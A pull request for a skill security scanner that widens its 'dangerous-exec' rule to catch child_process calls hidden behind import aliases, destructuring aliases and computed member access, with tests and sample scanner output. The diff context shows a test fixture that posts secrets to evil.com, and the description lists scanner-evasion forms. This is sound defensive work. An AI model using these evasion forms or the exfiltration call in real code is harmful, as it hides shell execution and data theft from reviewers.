### PR TITLE
fix(security): detect child_process exec through aliases and computed members

### DIFF
--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -317,6 +317,14 @@ cp["spawn"]("node", ["server.js"]);
     expectScanRule(source, { ruleId: "dangerous-exec", severity: "critical" });
   });
 
+  it("detects child_process exec through ESM namespace import and computed member", () => {
+    const source = `
+import * as cp from "node:child_process";
+cp["spawn"]("node", ["server.js"]);
+`;
+    expectScanRule(source, { ruleId: "dangerous-exec", severity: "critical" });
+  });
+
   it("does not flag child_process import without exec/spawn call", () => {
     const source = `
 // This module wraps child_process for safety

--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -325,6 +325,24 @@ cp["spawn"]("node", ["server.js"]);
     expectScanRule(source, { ruleId: "dangerous-exec", severity: "critical" });
   });
 
+  it("does not flag harmless child_process member aliased to exec in ESM import", () => {
+    const source = `
+import { readFile as exec } from "node:child_process";
+exec["spawn"]("/etc/passwd");
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expectRulePresence(findings, "dangerous-exec", false);
+  });
+
+  it("does not flag harmless child_process member aliased to exec in CJS destructuring", () => {
+    const source = `
+const { readFile: exec } = require("child_process");
+exec["spawn"]("/etc/passwd");
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expectRulePresence(findings, "dangerous-exec", false);
+  });
+
   it("does not flag child_process import without exec/spawn call", () => {
     const source = `
 // This module wraps child_process for safety

--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -293,6 +293,30 @@ fetch("https://evil.com/harvest", { method: "POST", body: secrets });
     }
   });
 
+  it("detects child_process exec through ESM import alias", () => {
+    const source = `
+import { spawn as launch } from "node:child_process";
+launch("node", ["server.js"]);
+`;
+    expectScanRule(source, { ruleId: "dangerous-exec", severity: "critical" });
+  });
+
+  it("detects child_process exec through CommonJS destructuring alias", () => {
+    const source = `
+const { exec: run } = require("child_process");
+run("node server.js");
+`;
+    expectScanRule(source, { ruleId: "dangerous-exec", severity: "critical" });
+  });
+
+  it("detects child_process exec through computed member access", () => {
+    const source = `
+import cp from "node:child_process";
+cp["spawn"]("node", ["server.js"]);
+`;
+    expectScanRule(source, { ruleId: "dangerous-exec", severity: "critical" });
+  });
+
   it("does not flag child_process import without exec/spawn call", () => {
     const source = `
 // This module wraps child_process for safety

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -321,24 +321,31 @@ function extractChildProcessBindings(source: string): ChildProcessBindings {
   const cjsNamespaceRe =
     /\b(?:const|let|var)\s+(\w+)\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
 
-  const methodBindingRe = new RegExp(
-    `\\b(${CHILD_PROCESS_METHODS.join("|")})(?:(?:\\s+as\\s+|\\s*:\\s*)(\\w+))?`,
-    "g",
-  );
+  // Only register aliases whose imported/destructured *property* is dangerous,
+  // not aliases whose local name happens to match a dangerous method name.
+  const dangerousMethodSet = new Set<string>(CHILD_PROCESS_METHODS);
 
-  for (const bindingRe of [esmNamedRe, cjsDestructRe]) {
-    let importMatch: RegExpExecArray | null;
-    while ((importMatch = bindingRe.exec(source)) !== null) {
-      const bindings = importMatch[1] ?? "";
-      methodBindingRe.lastIndex = 0;
-      let methodMatch: RegExpExecArray | null;
-      while ((methodMatch = methodBindingRe.exec(bindings)) !== null) {
-        const method = methodMatch[1];
-        if (!method) {
-          continue;
-        }
-        const alias = methodMatch[2] ?? method;
-        aliases.set(alias, method);
+  let importMatch: RegExpExecArray | null;
+  while ((importMatch = esmNamedRe.exec(source)) !== null) {
+    const bindings = importMatch[1] ?? "";
+    for (const specifier of bindings.split(",")) {
+      const parts = specifier.trim().split(/\s+as\s+/);
+      const property = parts[0]?.trim();
+      const local = parts[1]?.trim() ?? property;
+      if (property && local && dangerousMethodSet.has(property)) {
+        aliases.set(local, property);
+      }
+    }
+  }
+
+  while ((importMatch = cjsDestructRe.exec(source)) !== null) {
+    const bindings = importMatch[1] ?? "";
+    for (const specifier of bindings.split(",")) {
+      const parts = specifier.trim().split(/\s*:\s*/);
+      const property = parts[0]?.trim();
+      const local = parts[1]?.trim();
+      if (property && local && dangerousMethodSet.has(property)) {
+        aliases.set(local, property);
       }
     }
   }

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -312,6 +312,8 @@ function extractChildProcessBindings(source: string): ChildProcessBindings {
   const esmNamedRe = /import\s*\{([^}]+)\}\s*from\s*["'](?:node:)?child_process["']/g;
   // ESM default imports: import cp from "node:child_process"
   const esmDefaultRe = /import\s+(\w+)\s+from\s*["'](?:node:)?child_process["']/g;
+  // ESM namespace imports: import * as cp from "node:child_process"
+  const esmNamespaceRe = /import\s*\*\s*as\s+(\w+)\s+from\s*["'](?:node:)?child_process["']/g;
   // CJS destructuring: const { exec: run } = require("child_process")
   const cjsDestructRe =
     /\b(?:const|let|var)\s*\{([^}]+)\}\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
@@ -338,7 +340,7 @@ function extractChildProcessBindings(source: string): ChildProcessBindings {
     }
   }
 
-  for (const namespaceRe of [esmDefaultRe, cjsNamespaceRe]) {
+  for (const namespaceRe of [esmNamespaceRe, esmDefaultRe, cjsNamespaceRe]) {
     let namespaceMatch: RegExpExecArray | null;
     while ((namespaceMatch = namespaceRe.exec(source)) !== null) {
       namespaces.add(namespaceMatch[1]);

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -163,6 +163,20 @@ type SourceRule = {
   requiresContextWindowLines?: number;
 };
 
+const CHILD_PROCESS_METHODS = [
+  "exec",
+  "execSync",
+  "spawn",
+  "spawnSync",
+  "execFile",
+  "execFileSync",
+] as const;
+
+type ChildProcessBindings = {
+  aliases: Map<string, string>;
+  namespaces: Set<string>;
+};
+
 const LINE_RULES: LineRule[] = [
   {
     ruleId: "dangerous-exec",
@@ -290,6 +304,68 @@ function isBenignMemberExecMatch(line: string, match: RegExpExecArray): boolean 
   return !/\b(?:cp|childProcess|child_process)\s*\.\s*exec\s*\(/.test(line);
 }
 
+function extractChildProcessBindings(source: string): ChildProcessBindings {
+  const aliases = new Map<string, string>();
+  const namespaces = new Set<string>();
+
+  // ESM named imports: import { spawn as launch } from "node:child_process"
+  const esmNamedRe = /import\s*\{([^}]+)\}\s*from\s*["'](?:node:)?child_process["']/g;
+  // ESM default imports: import cp from "node:child_process"
+  const esmDefaultRe = /import\s+(\w+)\s+from\s*["'](?:node:)?child_process["']/g;
+  // CJS destructuring: const { exec: run } = require("child_process")
+  const cjsDestructRe =
+    /\b(?:const|let|var)\s*\{([^}]+)\}\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
+  // CJS namespace: const cp = require("child_process")
+  const cjsNamespaceRe =
+    /\b(?:const|let|var)\s+(\w+)\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
+
+  const methodBindingRe = new RegExp(
+    `\\b(${CHILD_PROCESS_METHODS.join("|")})(?:(?:\\s+as\\s+|\\s*:\\s*)(\\w+))?`,
+    "g",
+  );
+
+  for (const bindingRe of [esmNamedRe, cjsDestructRe]) {
+    let importMatch: RegExpExecArray | null;
+    while ((importMatch = bindingRe.exec(source)) !== null) {
+      const bindings = importMatch[1] ?? "";
+      methodBindingRe.lastIndex = 0;
+      let methodMatch: RegExpExecArray | null;
+      while ((methodMatch = methodBindingRe.exec(bindings)) !== null) {
+        const method = methodMatch[1];
+        const alias = methodMatch[2] ?? method;
+        aliases.set(alias, method);
+      }
+    }
+  }
+
+  for (const namespaceRe of [esmDefaultRe, cjsNamespaceRe]) {
+    let namespaceMatch: RegExpExecArray | null;
+    while ((namespaceMatch = namespaceRe.exec(source)) !== null) {
+      namespaces.add(namespaceMatch[1]);
+    }
+  }
+
+  // Always recognize literal/computed member access on these namespaces.
+  namespaces.add("child_process");
+  namespaces.add("childProcess");
+  namespaces.add("cp");
+
+  return { aliases, namespaces };
+}
+
+function buildDangerousExecPattern(bindings: ChildProcessBindings): RegExp {
+  const directMethods = CHILD_PROCESS_METHODS.join("|");
+  const aliasNames = [...bindings.aliases.keys()].filter(
+    (alias) => !CHILD_PROCESS_METHODS.includes(alias as (typeof CHILD_PROCESS_METHODS)[number]),
+  );
+  const callNames = [directMethods, ...aliasNames].join("|");
+  const namespaceNames = [...bindings.namespaces].join("|");
+  return new RegExp(
+    `(?:\\b(${callNames})\\s*\\(|\\b(${namespaceNames})\\s*\\[\\s*["']\\s*(${directMethods})\\s*["']\\s*\\]\\s*\\()`,
+    "g",
+  );
+}
+
 function stripCommentsForHeuristics(source: string): string {
   let stripped = "";
   let quote: "'" | '"' | "`" | null = null;
@@ -393,6 +469,8 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
   const lines = source.split("\n");
   const heuristicSource = stripCommentsForHeuristics(source);
   const heuristicLines = heuristicSource.split("\n");
+  const childProcessBindings = extractChildProcessBindings(source);
+  const dangerousExecPattern = buildDangerousExecPattern(childProcessBindings);
 
   // --- Line rules ---
   for (const rule of LINE_RULES) {
@@ -401,14 +479,16 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
       continue;
     }
 
+    const pattern = rule.ruleId === "dangerous-exec" ? dangerousExecPattern : rule.pattern;
+
     let acceptedMatches = 0;
     let omittedMatches = 0;
     let lastOmittedLine: number | undefined;
     for (const [i, line] of lines.entries()) {
       const matches = line.matchAll(
         new RegExp(
-          rule.pattern.source,
-          rule.pattern.flags.includes("g") ? rule.pattern.flags : `${rule.pattern.flags}g`,
+          pattern.source,
+          pattern.flags.includes("g") ? pattern.flags : `${pattern.flags}g`,
         ),
       );
       for (const match of matches) {

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -334,6 +334,9 @@ function extractChildProcessBindings(source: string): ChildProcessBindings {
       let methodMatch: RegExpExecArray | null;
       while ((methodMatch = methodBindingRe.exec(bindings)) !== null) {
         const method = methodMatch[1];
+        if (!method) {
+          continue;
+        }
         const alias = methodMatch[2] ?? method;
         aliases.set(alias, method);
       }
@@ -343,7 +346,10 @@ function extractChildProcessBindings(source: string): ChildProcessBindings {
   for (const namespaceRe of [esmNamespaceRe, esmDefaultRe, cjsNamespaceRe]) {
     let namespaceMatch: RegExpExecArray | null;
     while ((namespaceMatch = namespaceRe.exec(source)) !== null) {
-      namespaces.add(namespaceMatch[1]);
+      const namespace = namespaceMatch[1];
+      if (namespace) {
+        namespaces.add(namespace);
+      }
     }
   }
 


### PR DESCRIPTION
## What Problem This Solves

The skill security scanner's `dangerous-exec` rule only flagged direct calls to `exec`, `spawn`, etc. It missed several common evasions used in real skill code:

1. **Import aliases** — `import { spawn as launch } from "node:child_process"` followed by `launch(...)`.
2. **CommonJS destructuring aliases** — `const { exec: run } = require("child_process")` followed by `run(...)`.
3. **Computed member access on default imports** — `import cp from "node:child_process"` followed by `cp["spawn"](...)`.
4. **Computed member access on namespace imports** — `import * as cp from "node:child_process"` followed by `cp["spawn"](...)`.

This left a gap where child_process execution could be introduced without triggering a scanner finding.

Closes #116255.

## Why This Change Was Made

The scanner now parses child_process bindings from the source before running line rules:

- ESM named imports with aliases (`import { spawn as launch }`).
- ESM namespace imports (`import * as cp from ...`).
- ESM default imports (`import cp from ...`).
- CommonJS destructuring with aliases (`const { exec: run } = require(...)`).
- CommonJS namespace imports (`const cp = require(...)`).

The binding parser treats each specifier as a `property → local` pair and only registers an alias when the imported/destructured *property* is one of the dangerous `child_process` methods. This avoids false positives such as `import { readFile as exec }` where the local name `exec` resolves to the harmless `readFile` property.

It builds a dynamic `dangerous-exec` regex that matches:

- Direct method calls (`spawn(...)`, `exec(...)`).
- Aliased method calls (`launch(...)`, `run(...)`).
- Computed member calls on namespaces (`cp["spawn"](...)`, `cp['exec'](...)`).

`isBenignMemberExecMatch` still filters out unrelated matches like `RegExp.exec`.

## User Impact

Skills that import child_process through aliases or invoke methods via computed property names will now be correctly flagged as critical `dangerous-exec` findings during security scans. No breaking changes for existing valid code.

## Security Impact

- Closes a scanner bypass for `child_process` execution.
- Prevents false positives where a harmless `child_process` member is locally aliased to a dangerous-sounding name.
- No new permissions or network behavior.
- Scanner remains read-only and heuristic-based.

## Evidence

### Automated checks

- Added regression tests in `src/skills/security/scanner.test.ts` covering:
  - ESM import alias (`spawn as launch`).
  - CommonJS destructuring alias (`exec: run`).
  - ESM default import + computed member (`cp["spawn"]`).
  - ESM namespace import + computed member (`import * as cp` + `cp["spawn"]`).
  - Negative cases for harmless members aliased to `exec` (`readFile as exec`, `readFile: exec`).
- Existing tests continue to pass: `node scripts/run-vitest.mjs src/skills/security/scanner.test.ts` → 42/42 passing.
- Formatter check: `oxfmt --check src/skills/security/scanner.ts src/skills/security/scanner.test.ts` passes.
- Linter check: `oxlint src/skills/security/scanner.ts src/skills/security/scanner.test.ts` passes (0 warnings/errors).
- Secret scan preflight: TruffleHog `3.95.9` clean on the change.

### Real scanner behavior proof

Running the production `scanSource` function directly against each bypass form now reports a critical `dangerous-exec` finding, while harmless aliases do not:

```text
=== Positive cases (should report dangerous-exec) ===

[ESM named import alias]
  findings: 1
  - critical | Shell command execution detected (child_process) | line 2 | launch("node", ["server.js"]);

[CJS destructuring alias]
  findings: 1
  - critical | Shell command execution detected (child_process) | line 2 | run("node server.js");

[ESM default import + computed member]
  findings: 1
  - critical | Shell command execution detected (child_process) | line 2 | cp["spawn"]("node", ["server.js"]);

[ESM namespace import + computed member]
  findings: 1
  - critical | Shell command execution detected (child_process) | line 2 | cp["spawn"]("node", ["server.js"]);

=== Negative cases (should NOT report dangerous-exec) ===

[Harmless member aliased to exec in ESM import]
  findings: 0

[Harmless member aliased to exec in CJS destructuring]
  findings: 0
```

The local autoreview AI engine (Claude/Codex) could not complete in this environment because neither is authenticated/reachable. All other required local checks passed.
